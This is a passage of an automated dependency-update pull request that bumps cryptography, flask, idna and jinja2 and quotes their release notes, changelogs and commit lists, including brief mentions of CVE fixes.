changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003cp\u003e44.0.1 - 2025-02-11\u003c/p\u003e\n\u003cpre\u003e\u003ccode\u003e\n* Updated Windows, macOS, and Linux wheels to be compiled with OpenSSL 3.4.1.\n* We now build ``armv7l`` ``manylinux`` wheels and publish them to PyPI.\n* We now build ``manylinux_2_34`` wheels and publish them to PyPI.\n\u003cp\u003e.. _v44-0-0:\u003c/p\u003e\n\u003cp\u003e44.0.0 - 2024-11-27\n\u003c/code\u003e\u003c/pre\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eBACKWARDS INCOMPATIBLE:\u003c/strong\u003e Dropped support for LibreSSL \u0026lt; 3.9.\u003c/li\u003e\n\u003cli\u003eDeprecated Python 3.7 support. Python 3.7 is no longer supported by the\nPython core team. Support for Python 3.7 will be removed in a future\n\u003ccode\u003ecryptography\u003c/code\u003e release.\u003c/li\u003e\n\u003cli\u003eUpdated Windows, macOS, and Linux wheels to be compiled with OpenSSL 3.4.0.\u003c/li\u003e\n\u003cli\u003emacOS wheels are now built against the macOS 10.13 SDK. Users on older\nversions of macOS should upgrade, or they will need to build\n\u003ccode\u003ecryptography\u003c/code\u003e themselves.\u003c/li\u003e\n\u003cli\u003eEnforce the :rfc:\u003ccode\u003e5280\u003c/code\u003e requirement that extended key usage extensions must\nnot be empty.\u003c/li\u003e\n\u003cli\u003eAdded support for timestamp extraction to the\n:class:\u003ccode\u003e~cryptography.fernet.MultiFernet\u003c/code\u003e class.\u003c/li\u003e\n\u003cli\u003eRelax the Authority Key Identifier requirements on root CA certificates\nduring X.509 verification to allow fields permitted by :rfc:\u003ccode\u003e5280\u003c/code\u003e but\nforbidden by the CA/Browser BRs.\u003c/li\u003e\n\u003cli\u003eAdded support for :class:\u003ccode\u003e~cryptography.hazmat.primitives.kdf.argon2.Argon2id\u003c/code\u003e\nwhen using OpenSSL 3.2.0+.\u003c/li\u003e\n\u003cli\u003eAdded support for the :class:\u003ccode\u003e~cryptography.x509.Admissions\u003c/code\u003e certificate extension.\u003c/li\u003e\n\u003cli\u003eAdded basic support for PKCS7 decryption (including S/MIME 3.2) via\n:func:\u003ccode\u003e~cryptography.hazmat.primitives.serialization.pkcs7.pkcs7_decrypt_der\u003c/code\u003e,\n:func:\u003ccode\u003e~cryptography.hazmat.primitives.serialization.pkcs7.pkcs7_decrypt_pem\u003c/code\u003e, and\n:func:\u003ccode\u003e~cryptography.hazmat.primitives.serialization.pkcs7.pkcs7_decrypt_smime\u003c/code\u003e.\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e.. _v43-0-3:\u003c/p\u003e\n\u003cp\u003e43.0.3 - 2024-10-18\u003c/p\u003e\n\u003cpre\u003e\u003ccode\u003e\n* Fixed release metadata for ``cryptography-vectors``\n\u003cp\u003e.. _v43-0-2:\u003c/p\u003e\n\u003cp\u003e43.0.2 - 2024-10-18\n\u003c/code\u003e\u003c/pre\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eFixed compilation when using LibreSSL 4.0.0.\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e.. _v43-0-1:\u003c/p\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pyca/cryptography/commit/adaaaed77db676bbaa9d171175db81dce056e2a7\"\u003e\u003ccode\u003eadaaaed\u003c/code\u003e\u003c/a\u003e Bump for 44.0.1 release (\u003ca href=\"https://redirect.github.com/pyca/cryptography/issues/12441\"\u003e#12441\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pyca/cryptography/commit/ccc61dabe38b86956bf218565cd4e82b918345a1\"\u003e\u003ccode\u003eccc61da\u003c/code\u003e\u003c/a\u003e [backport] test and build on armv7l (\u003ca href=\"https://redirect.github.com/pyca/cryptography/issues/12420\"\u003e#12420\u003c/a\u003e) (\u003ca href=\"https://redirect.github.com/pyca/cryptography/issues/12431\"\u003e#12431\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pyca/cryptography/commit/f299a48153650f2dd87716343f2daa7cd39a1f59\"\u003e\u003ccode\u003ef299a48\u003c/code\u003e\u003c/a\u003e remove deprecated call (\u003ca href=\"https://redirect.github.com/pyca/cryptography/issues/12052\"\u003e#12052\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pyca/cryptography/commit/439eb0594a9ffb7c9adedb2490998d83914d141e\"\u003e\u003ccode\u003e439eb05\u003c/code\u003e\u003c/a\u003e Bump version for 44.0.0 (\u003ca href=\"https://redirect.github.com/pyca/cryptography/issues/12051\"\u003e#12051\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pyca/cryptography/commit/2c5ad4d8dcec1b8f833198bc2f3b4634c4fd9d78\"\u003e\u003ccode\u003e2c5ad4d\u003c/code\u003e\u003c/a\u003e chore(deps): bump maturin from 1.7.4 to 1.7.5 in /.github/requirements (\u003ca href=\"https://redirect.github.com/pyca/cryptography/issues/12050\"\u003e#12050\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pyca/cryptography/commit/d23968adddd79aa8508d7c1f985da09383b3808f\"\u003e\u003ccode\u003ed23968a\u003c/code\u003e\u003c/a\u003e chore(deps): bump libc from 0.2.165 to 0.2.166 (\u003ca href=\"https://redirect.github.com/pyca/cryptography/issues/12049\"\u003e#12049\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pyca/cryptography/commit/133c0e02edf2f172318eb27d8f50525ed64c9ec3\"\u003e\u003ccode\u003e133c0e0\u003c/code\u003e\u003c/a\u003e Bump x509-limbo and/or wycheproof in CI (\u003ca href=\"https://redirect.github.com/pyca/cryptography/issues/12047\"\u003e#12047\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pyca/cryptography/commit/f2259d7aa0d134c839ebe298baa8b63de9ead804\"\u003e\u003ccode\u003ef2259d7\u003c/code\u003e\u003c/a\u003e Bump BoringSSL and/or OpenSSL in CI (\u003ca href=\"https://redirect.github.com/pyca/cryptography/issues/12046\"\u003e#12046\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pyca/cryptography/commit/e201c870b89fd2606d67230a97e50c3badb07907\"\u003e\u003ccode\u003ee201c87\u003c/code\u003e\u003c/a\u003e fixed metadata in changelog (\u003ca href=\"https://redirect.github.com/pyca/cryptography/issues/12044\"\u003e#12044\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pyca/cryptography/commit/c6104cc3669585941dc1d2b9c6507621c53d242f\"\u003e\u003ccode\u003ec6104cc\u003c/code\u003e\u003c/a\u003e Prohibit Python 3.9.0, 3.9.1 -- they have a bug that causes errors (\u003ca href=\"https://redirect.github.com/pyca/cryptography/issues/12045\"\u003e#12045\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/pyca/cryptography/compare/2.2.2...44.0.1\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `flask` from 0.12.4 to 2.2.5\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/pallets/flask/releases\"\u003eflask's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e2.2.5\u003c/h2\u003e\n\u003cp\u003eThis is a security fix release for the 2.2.x release branch. Note that 2.3.x is the currently supported release branch; please upgrade to the latest version if possible.\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eSecurity advisory: \u003ca href=\"https://github.com/pallets/flask/security/advisories/GHSA-m2qf-hxjv-5gpq\"\u003ehttps://github.com/pallets/flask/security/advisories/GHSA-m2qf-hxjv-5gpq\u003c/a\u003e, CVE-2023-30861\u003c/li\u003e\n\u003cli\u003eChanges: \u003ca href=\"https://flask.palletsprojects.com/en/2.2.x/changes/#version-2-2-5\"\u003ehttps://flask.palletsprojects.com/en/2.2.x/changes/#version-2-2-5\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eMilestone: \u003ca href=\"https://github.com/pallets/flask/milestone/30?closed=1\"\u003ehttps://github.com/pallets/flask/milestone/30?closed=1\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e2.2.4\u003c/h2\u003e\n\u003cp\u003eThis is a fix release for the 2.2.x release branch.\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eChanges: \u003ca href=\"https://flask.palletsprojects.com/en/2.2.x/changes/#version-2-2-4\"\u003ehttps://flask.palletsprojects.com/en/2.2.x/changes/#version-2-2-4\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eMilestone: \u003ca href=\"https://github.com/pallets/flask/milestone/27?closed=1\"\u003ehttps://github.com/pallets/flask/milestone/27?closed=1\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e2.2.3\u003c/h2\u003e\n\u003cp\u003eThis is a fix release for the 2.2.x release branch.\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eChanges: \u003ca href=\"https://flask.palletsprojects.com/en/2.2.x/changes/#version-2-2-3\"\u003ehttps://flask.palletsprojects.com/en/2.2.x/changes/#version-2-2-3\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eMilestone: \u003ca href=\"https://github.com/pallets/flask/milestone/26?closed=1\"\u003ehttps://github.com/pallets/flask/milestone/26?closed=1\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e2.2.2\u003c/h2\u003e\n\u003cp\u003eThis is a fix release for the \u003ca href=\"https://github.com/pallets/flask/releases/tag/2.2.0\"\u003e2.2.0\u003c/a\u003e feature release.\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eChanges: \u003ca href=\"https://flask.palletsprojects.com/en/2.2.x/changes/#version-2-2-2\"\u003ehttps://flask.palletsprojects.com/en/2.2.x/changes/#version-2-2-2\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eMilestone: \u003ca href=\"https://github.com/pallets/flask/milestone/25?closed=1\"\u003ehttps://github.com/pallets/flask/milestone/25?closed=1\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e2.2.1\u003c/h2\u003e\n\u003cp\u003eThis is a fix release for the \u003ca href=\"https://github.com/pallets/flask/releases/tag/2.2.0\"\u003e2.2.0\u003c/a\u003e feature release.\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eChanges: \u003ca href=\"https://flask.palletsprojects.com/en/2.2.x/changes/#version-2-2-1\"\u003ehttps://flask.palletsprojects.com/en/2.2.x/changes/#version-2-2-1\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eMilestone: \u003ca href=\"https://github.com/pallets/flask/milestone/23?closed=1\"\u003ehttps://github.com/pallets/flask/milestone/23?closed=1\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e2.2.0\u003c/h2\u003e\n\u003cp\u003eThis is a feature release, which includes new features and removes previously deprecated code. The 2.2.x branch is now the supported bug fix branch, the 2.1.x branch will become a tag marking the end of support for that branch. We encourage everyone to upgrade, and to use a tool such as \u003ca href=\"https://pypi.org/project/pip-tools/\"\u003epip-tools\u003c/a\u003e to pin all dependencies and control upgrades.\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eChanges: \u003ca href=\"https://flask.palletsprojects.com/en/2.2.x/changes/#version-2-2-0\"\u003ehttps://flask.palletsprojects.com/en/2.2.x/changes/#version-2-2-0\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eMilestone: \u003ca href=\"https://github.com/pallets/flask/milestone/19?closed=1\"\u003ehttps://github.com/pallets/flask/milestone/19?closed=1\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e2.1.3\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eChanges: \u003ca href=\"https://flask.palletsprojects.com/en/2.1.x/changes/#version-2-1-3\"\u003ehttps://flask.palletsprojects.com/en/2.1.x/changes/#version-2-1-3\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eMilestone: \u003ca href=\"https://github.com/pallets/flask/milestone/22?closed=1\"\u003ehttps://github.com/pallets/flask/milestone/22?closed=1\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e2.1.2\u003c/h2\u003e\n\u003cp\u003eThis is a fix release for the \u003ca href=\"https://github.com/pallets/flask/releases/tag/2.1.0\"\u003e2.1.0\u003c/a\u003e feature release.\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eChanges: \u003ca href=\"https://flask.palletsprojects.com/en/2.1.x/changes/#version-2-1-2\"\u003ehttps://flask.palletsprojects.com/en/2.1.x/changes/#version-2-1-2\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eMilestone: \u003ca href=\"https://github.com/pallets/flask/milestone/21?closed=1\"\u003ehttps://github.com/pallets/flask/milestone/21?closed=1\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e2.1.1\u003c/h2\u003e\n\u003cp\u003eThis is a fix release for the \u003ca href=\"https://github.com/pallets/flask/releases/tag/2.1.0\"\u003e2.1.0\u003c/a\u003e feature release.\u003c/p\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/pallets/flask/blob/main/CHANGES.rst\"\u003eflask's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003eVersion 2.2.5\u003c/h2\u003e\n\u003cp\u003eReleased 2023-05-02\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eUpdate for compatibility with Werkzeug 2.3.3.\u003c/li\u003e\n\u003cli\u003eSet \u003ccode\u003eVary: Cookie\u003c/code\u003e header when the session is accessed, modified, or refreshed.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eVersion 2.2.4\u003c/h2\u003e\n\u003cp\u003eReleased 2023-04-25\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eUpdate for compatibility with Werkzeug 2.3.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eVersion 2.2.3\u003c/h2\u003e\n\u003cp\u003eReleased 2023-02-15\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eAutoescape is enabled by default for \u003ccode\u003e.svg\u003c/code\u003e template files. :issue:\u003ccode\u003e4831\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eFix the type of \u003ccode\u003etemplate_folder\u003c/code\u003e to accept \u003ccode\u003epathlib.Path\u003c/code\u003e. :issue:\u003ccode\u003e4892\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eAdd \u003ccode\u003e--debug\u003c/code\u003e option to the \u003ccode\u003eflask run\u003c/code\u003e command. :issue:\u003ccode\u003e4777\u003c/code\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eVersion 2.2.2\u003c/h2\u003e\n\u003cp\u003eReleased 2022-08-08\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eUpdate Werkzeug dependency to \u0026gt;= 2.2.2. This includes fixes related\nto the new faster router, header parsing, and the development\nserver. :pr:\u003ccode\u003e4754\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eFix the default value for \u003ccode\u003eapp.env\u003c/code\u003e to be \u003ccode\u003e\u0026quot;production\u0026quot;\u003c/code\u003e. This\nattribute remains deprecated. :issue:\u003ccode\u003e4740\u003c/code\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eVersion 2.2.1\u003c/h2\u003e\n\u003cp\u003eReleased 2022-08-03\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eSetting or accessing \u003ccode\u003ejson_encoder\u003c/code\u003e or \u003ccode\u003ejson_decoder\u003c/code\u003e raises a\ndeprecation warning. :issue:\u003ccode\u003e4732\u003c/code\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eVersion 2.2.0\u003c/h2\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pallets/flask/commit/47af817c8fe01045c641b97f8fb784c7ad864eee\"\u003e\u003ccode\u003e47af817\u003c/code\u003e\u003c/a\u003e release version 2.2.5\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pallets/flask/commit/afd63b16170b7c047f5758eb910c416511e9c965\"\u003e\u003ccode\u003eafd63b1\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/pallets/flask/issues/5109\"\u003e#5109\u003c/a\u003e from pallets/backport-vary-cookie\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pallets/flask/commit/8646edca6f47e2cd57464081b3911218d4734f8d\"\u003e\u003ccode\u003e8646edc\u003c/code\u003e\u003c/a\u003e set \u003ccode\u003eVary: Cookie\u003c/code\u003e header consistently for session\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pallets/flask/commit/a6367dac747c1e149c60767eee7e8aa9c281c58e\"\u003e\u003ccode\u003ea6367da\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/pallets/flask/issues/5108\"\u003e#5108\u003c/a\u003e from pallets/werkzeug-compat\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pallets/flask/commit/3fbfbad79fe294918459b70eb409d555b20de2c8\"\u003e\u003ccode\u003e3fbfbad\u003c/code\u003e\u003c/a\u003e werkzeug 2.3.3 compatibility\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pallets/flask/commit/726d3f4fa9e8a2960541debc2d2713571da54441\"\u003e\u003ccode\u003e726d3f4\u003c/code\u003e\u003c/a\u003e start version 2.2.5\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pallets/flask/commit/ddc7accaa2e83b328f969c120af2ce0804876b4a\"\u003e\u003ccode\u003eddc7acc\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/pallets/flask/issues/5081\"\u003e#5081\u003c/a\u003e from pallets/release-2.2.4\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pallets/flask/commit/74e03298200e33951ca350a35aa3a8c0b4ff8177\"\u003e\u003ccode\u003e74e0329\u003c/code\u003e\u003c/a\u003e release version 2.2.4\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pallets/flask/commit/2d460685b1b3d66c713739ee91183c22fb2e5dc8\"\u003e\u003ccode\u003e2d46068\u003c/code\u003e\u003c/a\u003e update dev env\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pallets/flask/commit/64bc45874daf4b9828830ea0037a19beb8364ee3\"\u003e\u003ccode\u003e64bc458\u003c/code\u003e\u003c/a\u003e update dev dependencies\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/pallets/flask/compare/0.12.4...2.2.5\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `idna` from 2.6 to 3.7\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/kjd/idna/releases\"\u003eidna's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev3.7\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eFix issue where specially crafted inputs to encode() could take exceptionally long amount of time to process. [CVE-2024-3651]\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eThanks to Guido Vranken for reporting the issue.\u003c/p\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/kjd/idna/compare/v3.6...v3.7\"\u003ehttps://github.com/kjd/idna/compare/v3.6...v3.7\u003c/a\u003e\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/kjd/idna/blob/master/HISTORY.rst\"\u003eidna's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003cp\u003e3.7 (2024-04-11)\n++++++++++++++++\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eFix issue where specially crafted inputs to encode() could\ntake exceptionally long amount of time to process. [CVE-2024-3651]\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eThanks to Guido Vranken for reporting the issue.\u003c/p\u003e\n\u003cp\u003e3.6 (2023-11-25)\n++++++++++++++++\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eFix regression to include tests in source distribution.\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e3.5 (2023-11-24)\n++++++++++++++++\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eUpdate to Unicode 15.1.0\u003c/li\u003e\n\u003cli\u003eString codec name is now \u0026quot;idna2008\u0026quot; as overriding the system codec\n\u0026quot;idna\u0026quot; was not working.\u003c/li\u003e\n\u003cli\u003eFix typing error for codec encoding\u003c/li\u003e\n\u003cli\u003e\u0026quot;setup.cfg\u0026quot; has been added for this release due to some downstream\nlack of adherence to PEP 517. Should be removed in a future release\nso please prepare accordingly.\u003c/li\u003e\n\u003cli\u003eRemoved reliance on a symlink for the \u0026quot;idna-data\u0026quot; tool to comport\nwith PEP 517 and the Python Packaging User Guide for sdist archives.\u003c/li\u003e\n\u003cli\u003eAdded security reporting protocol for project\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eThanks Jon Ribbens, Diogo Teles Sant'Anna, Wu Tingfeng for contributions\nto this release.\u003c/p\u003e\n\u003cp\u003e3.4 (2022-09-14)\n++++++++++++++++\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eUpdate to Unicode 15.0.0\u003c/li\u003e\n\u003cli\u003eMigrate to pyproject.toml for build information (PEP 621)\u003c/li\u003e\n\u003cli\u003eCorrect another instance where generic exception was raised instead of\nIDNAError for malformed input\u003c/li\u003e\n\u003cli\u003eSource distribution uses zeroized file ownership for improved\nreproducibility\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eThanks to Seth Michael Larson for contributions to this release.\u003c/p\u003e\n\u003cp\u003e3.3 (2021-10-13)\n++++++++++++++++\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eUpdate to Unicode 14.0.0\u003c/li\u003e\n\u003cli\u003eUpdate to in-line type annotations\u003c/li\u003e\n\u003cli\u003eThrow IDNAError exception correctly for some malformed input\u003c/li\u003e\n\u003cli\u003eAdvertise support for Python 3.10\u003c/li\u003e\n\u003cli\u003eImprove testing regime on Github\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/kjd/idna/commit/1d365e17e10d72d0b7876316fc7b9ca0eebdd38d\"\u003e\u003ccode\u003e1d365e1\u003c/code\u003e\u003c/a\u003e Release v3.7\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/kjd/idna/commit/c1b3154939907fab67c5754346afaebe165ce8e6\"\u003e\u003ccode\u003ec1b3154\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/kjd/idna/issues/172\"\u003e#172\u003c/a\u003e from kjd/optimize-contextj\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/kjd/idna/commit/0394ec76ff022813e770ba1fd89658790ea35623\"\u003e\u003ccode\u003e0394ec7\u003c/code\u003e\u003c/a\u003e Merge branch 'master' into optimize-contextj\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/kjd/idna/commit/cd58a23173d2b0a40b95ee680baf3e59e8d33966\"\u003e\u003ccode\u003ecd58a23\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/kjd/idna/issues/152\"\u003e#152\u003c/a\u003e from elliotwutingfeng/dev\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/kjd/idna/commit/5beb28b9dd77912c0dd656d8b0fdba3eb80222e7\"\u003e\u003ccode\u003e5beb28b\u003c/code\u003e\u003c/a\u003e More efficient resolution of joiner contexts\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/kjd/idna/commit/1b121483ed04d9576a1291758f537e1318cddc8b\"\u003e\u003ccode\u003e1b12148\u003c/code\u003e\u003c/a\u003e Update ossf/scorecard-action to v2.3.1\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/kjd/idna/commit/d516b874c3388047934938a500c7488d52c4e067\"\u003e\u003ccode\u003ed516b87\u003c/code\u003e\u003c/a\u003e Update Github actions/checkout to v4\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/kjd/idna/commit/c095c75943413c75ebf8ac74179757031b7f80b7\"\u003e\u003ccode\u003ec095c75\u003c/code\u003e\u003c/a\u003e Merge branch 'master' into dev\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/kjd/idna/commit/60a0a4cb61ec6834d74306bd8a1fa46daac94c98\"\u003e\u003ccode\u003e60a0a4c\u003c/code\u003e\u003c/a\u003e Fix typo in GitHub Actions workflow key\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/kjd/idna/commit/5918a0ef8034379c2e409ae93ee11d24295bb201\"\u003e\u003ccode\u003e5918a0e\u003c/code\u003e\u003c/a\u003e Merge branch 'master' into dev\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/kjd/idna/compare/v2.6...v3.7\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `jinja2` from 2.10 to 3.1.6\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/pallets/jinja/releases\"\u003ejinja2's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e3.1.6\u003c/h2\u003e\n\u003cp\u003eThis is the Jinja 3.1.6 security release, which fixes security issues but does not otherwise change behavior and should not result in breaking changes compared to the latest feature release.\u003c/p\u003e\n\u003cp\u003ePyPI: \u003ca href=\"https://pypi.org/project/Jinja2/3.1.6/\"\u003ehttps://pypi.org/project/Jinja2/3.1.6/\u003c/a\u003e\nChanges: \u003ca href=\"https://jinja.palletsprojects.com/en/stable/changes/#version-3-1-6\"\u003ehttps://jinja.palletsprojects.com/en/stable/changes/#version-3-1-6\u003c/a\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eThe \u003ccode\u003e|attr\u003c/code\u003e filter does not bypass the environment's attribute lookup, allowing the sandbox to apply its checks. \u003ca href=\"https://github.com/pallets/jinja/security/advisories/GHSA-cpwx-vrp4-4pq7\"\u003ehttps://github.com/pallets/jinja/security/advisories/GHSA-cpwx-vrp4-4pq7\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e3.1.5\u003c/h2\u003e\n\u003cp\u003eThis is the Jinja 3.1.5 security fix release, which fixes security issues and bugs but does not otherwise change behavior and should not result in breaking changes compared to the latest feature release.\u003c/p\u003e\n\u003cp\u003ePyPI: \u003ca href=\"https://pypi.org/project/Jinja2/3.1.5/\"\u003ehttps://pypi.org/project/Jinja2/3.1.5/\u003c/a\u003e\nChanges: \u003ca href=\"https://jinja.palletsprojects.com/changes/#version-3-1-5\"\u003ehttps://jinja.palletsprojects.com/changes/#version-3-1-5\u003c/a\u003e\nMilestone: \u003ca href=\"https://github.com/pallets/jinja/milestone/16?closed=1\"\u003ehttps://github.com/pallets/jinja/milestone/16?closed=1\u003c/a\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eThe sandboxed environment handles indirect calls to \u003ccode\u003estr.format\u003c/code\u003e, such as by passing a stored reference to a filter that calls its argument. \u003ca href=\"https://github.com/pallets/jinja/security/advisories/GHSA-q2x7-8rv6-6q7h\"\u003eGHSA-q2x7-8rv6-6q7h\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eEscape template name before formatting it into error messages, to avoid issues with names that contain f-string syntax. \u003ca 